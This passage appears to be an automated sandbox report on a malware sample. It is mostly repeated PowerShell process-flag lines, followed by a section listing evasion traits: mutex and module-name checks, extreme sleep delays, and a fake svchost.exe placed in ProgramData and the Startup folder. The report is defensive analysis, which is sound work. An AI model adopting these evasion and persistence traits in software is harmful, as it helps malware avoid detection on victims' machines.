        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\svchost\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Found evasive API chain (may stop execution after checking mutex)
        Source: C:\ProgramData\svchost\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_10-10524
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4873Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 416Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeWindow / User API: threadDelayed 5773Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeWindow / User API: threadDelayed 4221Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2620Jump to behavior
        Source: C:\ProgramData\svchost\svchost.exeWindow / User API: threadDelayed 7908Jump to behavior
        Source: C:\ProgramData\svchost\svchost.exeWindow / User API: threadDelayed 2091Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2767
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2075
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 820
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 900
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 468
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 589
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4092
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4459
        Source: C:\ProgramData\svchost\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-9360
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-9052
        Source: C:\ProgramData\svchost\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_10-9609
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676Thread sleep count: 5773 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676Thread sleep time: -144325s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676Thread sleep count: 4221 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exe TID: 2676Thread sleep time: -105525s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 2620 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep count: 147 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308Thread sleep count: 7908 > 30Jump to behavior
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308Thread sleep time: -158160s >= -30000sJump to behavior
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308Thread sleep count: 2091 > 30Jump to behavior
        Source: C:\ProgramData\svchost\svchost.exe TID: 7308Thread sleep time: -41820s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 2767 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 2075 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7760Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7760Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 820 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 209 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 900 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep count: 468 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 589 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 4092 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 4459 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Temp\tg.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\tg.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\ProgramData\svchost\svchost.exeLast function: Thread delayed
        Source: C:\ProgramData\svchost\svchost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\tg.exeThread sleep count: Count: 5773 delay: -25Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeThread sleep count: Count: 4221 delay: -25Jump to behavior
        Source: C:\ProgramData\svchost\svchost.exeThread sleep count: Count: 7908 delay: -20Jump to behavior
        Source: C:\ProgramData\svchost\svchost.exeThread sleep count: Count: 2091 delay: -20Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACA9C0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669ACA9C0
